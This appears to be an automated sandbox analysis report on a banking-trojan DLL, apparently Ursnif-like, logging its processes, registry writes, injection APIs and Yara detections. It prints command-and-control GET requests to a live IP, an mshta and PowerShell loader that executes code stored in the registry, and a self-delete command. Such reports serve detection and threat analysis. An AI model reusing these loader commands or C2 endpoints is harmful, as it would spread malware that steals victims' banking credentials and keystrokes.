                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View ASN Name: TENET-1ZA
Source: Joe Sandbox View IP Address: 146.70.35.138
Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/phpadmin/4B
Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0
Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/
Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://146.70.35.138/phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZ
Source: rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://177./h
Source: rundll32.exe, 00000002.00000003.591058289.0000000002F96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/phpadmin/J3_2FKtm_2/F8aRElX_2BaCkdSRs/XtZ8Oh_2FZR9/F7u3NLyz0yr/dRj0x6bx
Source: rundll32.exe, 00000002.00000003.591058289.0000000002F96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/t0=
Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000012.00000003.673423519.00000212B8284000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04894CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_04894CC6
                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZikS/u68wld8v7/JzQJUDKg4_2FHKvnf_2F/gYZGX_2BFqw2fP1CIUg/LkSLAUfxVpj9UOLBiN4SzM/3p_2FST_2BWxB/bEkLoFXP/JI38DjkOM8fg69zOOdXCrW3/ft8HZYP438/0Zqpj_2F45Rs54Oh9/T9vyzwf7yRUW/99MF_2BHC7D/O7af6TuFb/aLreGz.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138 (50 identical detections)

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04893072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_04893072

                      System Summary

                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489821C 2_2_0489821C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489198A 2_2_0489198A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489475F 2_2_0489475F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6C3A9 2_2_00B6C3A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B70B0E 2_2_00B70B0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B684D9 2_2_00B684D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B51E50 2_2_00B51E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B58FA6 2_2_00B58FA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B737F4 2_2_00B737F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6488B CreateProcessAsUserW,2_2_00B6488B
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: nhLAwAo49f.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04893A9C NtMapViewOfSection,2_2_04893A9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04894695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_04894695
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048925D7 GetProcAddress,NtCreateSection,memset,2_2_048925D7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04898441 NtQueryVirtualMemory,2_2_04898441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6312E RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_00B6312E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B712F1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_00B712F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B594A5 NtMapViewOfSection,2_2_00B594A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B644A5 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,2_2_00B644A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65CA1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_00B65CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B51C78 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,2_2_00B51C78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6AD9E NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_00B6AD9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65D9D NtQueryInformationProcess,2_2_00B65D9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6F5FF memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,2_2_00B6F5FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5DDDD GetProcAddress,NtCreateSection,memset,2_2_00B5DDDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6B628 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_00B6B628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5CF88 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,2_2_00B5CF88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5A085 memset,NtQueryInformationProcess,2_2_00B5A085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65830 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,2_2_00B65830
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B529B2 NtGetContextThread,RtlNtStatusToDosError,2_2_00B529B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65188 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_00B65188
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6C1C2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_00B6C1C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B57A1E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_00B57A1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B51B92 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_00B51B92
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6264B NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,2_2_00B6264B
                      Source: nhLAwAo49f.dllBinary or memory string: OriginalFilenamerpcapd.exe0 vs nhLAwAo49f.dll
                      Source: nhLAwAo49f.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220422
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@31/29@0/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: nhLAwAo49f.dllReversingLabs: Detection: 28%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 616
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 652
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: unknown unknown
